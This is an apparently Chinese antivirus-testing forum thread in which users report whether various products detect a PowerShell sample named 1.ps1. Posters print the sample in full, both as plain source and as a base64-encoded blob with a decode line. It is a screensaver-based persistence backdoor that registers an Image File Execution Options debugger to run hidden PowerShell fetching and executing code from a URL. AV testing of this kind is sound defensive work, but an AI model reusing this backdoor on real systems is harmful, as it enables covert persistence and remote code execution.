x1（6.6）

秋日之殇

rt

mogu6666

事件: 下载被拒绝
用户: XXX
用户类型: 活动用户
应用程序名称: chrome.exe
应用程序路径: C:\Program Files\Google\Chrome\Application
组件: 安全浏览
结果说明: 已阻止
类型: 木马
名称: Trojan.PowerShell.Agent.tn
精确度: 确切
威胁级别: 高
对象类型: 文件
对象名称: 1.ps1
对象路径: https://bbs.kafan.cn/forum.php?m ... 8MjIzNjY1MQ%3D%3D//
对象的 MD5: 0D226617C236E05B1990C393B1CCDE8E
原因: 数据库
数据库发布日期: 今天，2022/6/6 20:31:00

aboringman

360：miss

双击无（弹窗）反应。

kuroandsan

avast miss
双击确认后无反应？（

Eset小粉絲

1. function Add-ScrnSaveBackdoor
   
2. {
   
3.     [CmdletBinding()] Param(
   
4.         [Parameter(Position = 0, Mandatory = $False)]
   
5.         [String]
   
6.         $Payload,
   
7. 
   
8.         [Parameter(Position = 1, Mandatory = $False)]
   
9.         [String]
   
10.         $PayloadURL,
    
11. 
    
12.         [Parameter(Position = 2, Mandatory = $False)]
    
13.         [String]
    
14.         $Arguments,
    
15. 
    
16.         [Parameter(Position = 3, Mandatory = $False)]
    
17.         [String]
    
18.         $NewScreenSaver = "C:\Windows\System32\Ribbons.scr"
    
19.     )
    
20.    
    
21.     #Check if ScreenSaver is enabled
    
22.     #If no enable it, if yes, get its value
    
23.     if ((Get-Item "HKCU:\Control Panel\Desktop").GetValue("SCRNSAVE.EXE") -eq $null)
    
24.     {
    
25.         New-ItemProperty "HKCU:\Control Panel\Desktop" -Name SCRNSAVE.EXE -Value $NewScreenSaver -PropertyType String
    
26.         $ScreenSaverName = ($NewScreenSaver -split '\\')[-1]
    
27.     }
    
28.     else
    
29.     {
    
30.         $ScreenSaverName = ((Get-Item "HKCU:\Control Panel\Desktop").GetValue("SCRNSAVE.EXE") -split '\\')[-1]
    
31.     }
    
32. 
    
33.     #Set ScreenSaveTimeOut which is necessary to enable screensaver.
    
34.     if ((Get-Item "HKCU:\Control Panel\Desktop").GetValue("ScreenSaveTimeOut") -eq $null)
    
35.     {
    
36.         New-ItemProperty "HKCU:\Control Panel\Desktop" -Name ScreenSaveTimeOut -Value 60 -PropertyType String
    
37.     }
    
38.     else
    
39.     {
    
40.         Set-ItemProperty "HKCU:\Control Panel\Desktop" -Name ScreenSaveTimeOut -Value 60
    
41.     }
    
42.    
    
43.     #Get a list of default screensavers and select one at random
    
44.     $ListScrn = Get-ChildItem C:\Windows\System32\*.scr | Where-Object {$_.Name -ne $ScreenSaverName}
    
45.     $PathToScreensaver = Get-Random $ListScrn
    
46. 
    
47.     #Add a default screensaver to payload so that it runs after our payload.
    
48.     if(!$Payload)
    
49.     {
    
50.         $RegValue = "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments" + ";" + $PathToScreensaver + " /s"
    
51.     }
    
52.     elseif ($Payload)
    
53.     {
    
54.         $RegValue = $Payload + ";" + $Arguments + ";" + $PathToScreensaver + " /s"
    
55.     }
    
56.     #Set Debugger for the ScreenSaver executable
    
57.     if (Test-Path -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName")
    
58.     {
    
59.         
    
60.         Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName" -Name Debugger -Value $RegValue
    
61.         Write-Output "Payload added as Debugger for $ScreenSaverName"
    
62.     }
    
63.     else
    
64.     {
    
65.         New-Item "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName"
    
66.         Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName" -Name Debugger -Value $RegValue
    
67.         Write-Output "Payload added as Debugger for $ScreenSaverName"
    
68.     }
    
69. }
    
70. Add-ScrnSaveBackdoor -Payload "powershell.exe calc.exe"

复制代码

Reversed - Assembly

aboringman

Eset小粉絲 发表于 2022-6-7 00:28
Reversed - Assembly

huangzihang

BD kill

Web Protection by
Bitdefender
Dangerous page blocked for your protection
https://bbs.kafan.cn/forum.php?m ... TV8MjIzNjY1MQ%3D%3D
Dangerous pages attempt to install software that can harm the device, gather personal information or operate without your consent.

zkr090612

联管miss

1. $DoIt = @'
   
2. ZnVuY3Rpb24gQWRkLVNjcm5TYXZlQmFja2Rvb3IKewogICAgW0NtZGxldEJpbmRpbmcoKV0gUGFyYW0oCiAgICAgICAgW1BhcmFtZXRlcihQb3NpdGlvbiA9IDAsIE1hbmRhdG9yeSA9ICRGYWxzZSldCiAgICAgICAgW1N0cmluZ10KICAgICAgICAkUGF5bG9hZCwKCiAgICAgICAgW1BhcmFtZXRlcihQb3NpdGlvbiA9IDEsIE1hbmRhdG9yeSA9ICRGYWxzZSldCiAgICAgICAgW1N0cmluZ10KICAgICAgICAkUGF5bG9hZFVSTCwKCiAgICAgICAgW1BhcmFtZXRlcihQb3NpdGlvbiA9IDIsIE1hbmRhdG9yeSA9ICRGYWxzZSldCiAgICAgICAgW1N0cmluZ10KICAgICAgICAkQXJndW1lbnRzLAoKICAgICAgICBbUGFyYW1ldGVyKFBvc2l0aW9uID0gMywgTWFuZGF0b3J5ID0gJEZhbHNlKV0KICAgICAgICBbU3RyaW5nXQogICAgICAgICROZXdTY3JlZW5TYXZlciA9ICJDOlxXaW5kb3dzXFN5c3RlbTMyXFJpYmJvbnMuc2NyIgogICAgKQogICAgCiAgICAjQ2hlY2sgaWYgU2NyZWVuU2F2ZXIgaXMgZW5hYmxlZAogICAgI0lmIG5vIGVuYWJsZSBpdCwgaWYgeWVzLCBnZXQgaXRzIHZhbHVlCiAgICBpZiAoKEdldC1JdGVtICJIS0NVOlxDb250cm9sIFBhbmVsXERlc2t0b3BcIikuR2V0VmFsdWUoIlNDUk5TQVZFLkVYRSIpIC1lcSAkbnVsbCkKICAgIHsKICAgICAgICBOZXctSXRlbVByb3BlcnR5ICJIS0NVOlxDb250cm9sIFBhbmVsXERlc2t0b3BcIiAtTmFtZSBTQ1JOU0FWRS5FWEUgLVZhbHVlICROZXdTY3JlZW5TYXZlciAtUHJvcGVydHlUeXBlIFN0cmluZwogICAgICAgICRTY3JlZW5TYXZlck5hbWUgPSAoJE5ld1NjcmVlblNhdmVyIC1zcGxpdCAnXFwnKVstMV0KICAgIH0KICAgIGVsc2UKICAgIHsKICAgICAgICAkU2NyZWVuU2F2ZXJOYW1lID0gKChHZXQtSXRlbSAiSEtDVTpcQ29udHJvbCBQYW5lbFxEZXNrdG9wXCIpLkdldFZhbHVlKCJTQ1JOU0FWRS5FWEUiKSAtc3BsaXQgJ1xcJylbLTFdCiAgICB9CgogICAgI1NldCBTY3JlZW5TYXZlVGltZU91dCB3aGljaCBpcyBuZWNlc3NhcnkgdG8gZW5hYmxlIHNjcmVlbnNhdmVyLgogICAgaWYgKChHZXQtSXRlbSAiSEtDVTpcQ29udHJvbCBQYW5lbFxEZXNrdG9wXCIpLkdldFZhbHVlKCJTY3JlZW5TYXZlVGltZU91dCIpIC1lcSAkbnVsbCkKICAgIHsKICAgICAgICBOZXctSXRlbVByb3BlcnR5ICJIS0NVOlxDb250cm9sIFBhbmVsXERlc2t0b3BcIiAtTmFtZSBTY3JlZW5TYXZlVGltZU91dCAtVmFsdWUgNjAgLVByb3BlcnR5VHlwZSBTdHJpbmcKICAgIH0gCiAgICBlbHNlCiAgICB7CiAgICAgICAgU2V0LUl0ZW1Qcm9wZXJ0eSAiSEtDVTpcQ29udHJvbCBQYW5lbFxEZXNrdG9wXCIgLU5hbWUgU2NyZWVuU2F2ZVRpbWVPdXQgLVZhbHVlIDYwCiAgICB9CiAgICAKICAgICNHZXQgYSBsaXN0IG9mIGRlZmF1bHQgc2NyZWVuc2F2ZXJzIGFuZCBzZWxlY3Qgb25lIGF0IHJhbmRvbQogICAgJExpc3RTY3JuID0gR2V0LUNoaWxkSXRlbSBDOlxXaW5kb3dzXFN5c3RlbTMyXCouc2NyIHwgV2hlcmUtT2JqZWN0IHskXy5OYW1lIC1uZSAkU2NyZWVuU2F2ZXJOYW1lfQogICAgJFBhdGhUb1NjcmVlbnNhdmVyID0gR2V0LVJhbmRvbSAkTGlzdFNjcm4KCiAgICAjQWRkIGEgZGVmYXVsdCBzY3JlZW5zYXZlciB0byBwYXlsb2FkIHNvIHRoYXQgaXQgcnVucyBhZnRlciBvdXIgcGF5bG9hZC4KICAgIGlmKCEkUGF5bG9hZCkKICAgIHsKICAgICAgICAkUmVnVmFsdWUgPSAicG93ZXJzaGVsbC5leGUgLVdpbmRvd1N0eWxlIGhpZGRlbiAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtbm9sb2dvIC1ub3Byb2ZpbGUgLWMgSUVYICgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnJFBheWxvYWRVUkwnKSk7JEFyZ3VtZW50cyIgKyAiOyIgKyAkUGF0aFRvU2NyZWVuc2F2ZXIgKyAiIC9zIgogICAgfQogICAgZWxzZWlmICgkUGF5bG9hZCkKICAgIHsKICAgICAgICAkUmVnVmFsdWUgPSAkUGF5bG9hZCArICI7IiArICRBcmd1bWVudHMgKyAiOyIgKyAkUGF0aFRvU2NyZWVuc2F2ZXIgKyAiIC9zIgogICAgfQogICAgI1NldCBEZWJ1Z2dlciBmb3IgdGhlIFNjcmVlblNhdmVyIGV4ZWN1dGFibGUKICAgIGlmIChUZXN0LVBhdGggLVBhdGggIkhLTE06XFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzIE5UXEN1cnJlbnRWZXJzaW9uXEltYWdlIEZpbGUgRXhlY3V0aW9uIE9wdGlvbnNcJFNjcmVlblNhdmVyTmFtZSIpCiAgICB7CiAgICAgICAgCiAgICAgICAgU2V0LUl0ZW1Qcm9wZXJ0eSAiSEtMTTpcU09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1wkU2NyZWVuU2F2ZXJOYW1lIiAtTmFtZSBEZWJ1Z2dlciAtVmFsdWUgJFJlZ1ZhbHVlCiAgICAgICAgV3JpdGUtT3V0cHV0ICJQYXlsb2FkIGFkZGVkIGFzIERlYnVnZ2VyIGZvciAkU2NyZWVuU2F2ZXJOYW1lIgogICAgfQogICAgZWxzZQogICAgewogICAgICAgIE5ldy1JdGVtICJIS0xNOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93cyBOVFxDdXJyZW50VmVyc2lvblxJbWFnZSBGaWxlIEV4ZWN1dGlvbiBPcHRpb25zXCRTY3JlZW5TYXZlck5hbWUiCiAgICAgICAgU2V0LUl0ZW1Qcm9wZXJ0eSAiSEtMTTpcU09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1wkU2NyZWVuU2F2ZXJOYW1lIiAtTmFtZSBEZWJ1Z2dlciAtVmFsdWUgJFJlZ1ZhbHVlCiAgICAgICAgV3JpdGUtT3V0cHV0ICJQYXlsb2FkIGFkZGVkIGFzIERlYnVnZ2VyIGZvciAkU2NyZWVuU2F2ZXJOYW1lIgogICAgfQp9CkFkZC1TY3JuU2F2ZUJhY2tkb29yIC1QYXlsb2FkICJwb3dlcnNoZWxsLmV4ZSBjYWxjLmV4ZSI==
   
3. '@
   
4. $decode = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($DoIt))
   
5. 
   

复制代码

lingdu233

红伞扫描miss

心醉咖啡

毒霸扫描miss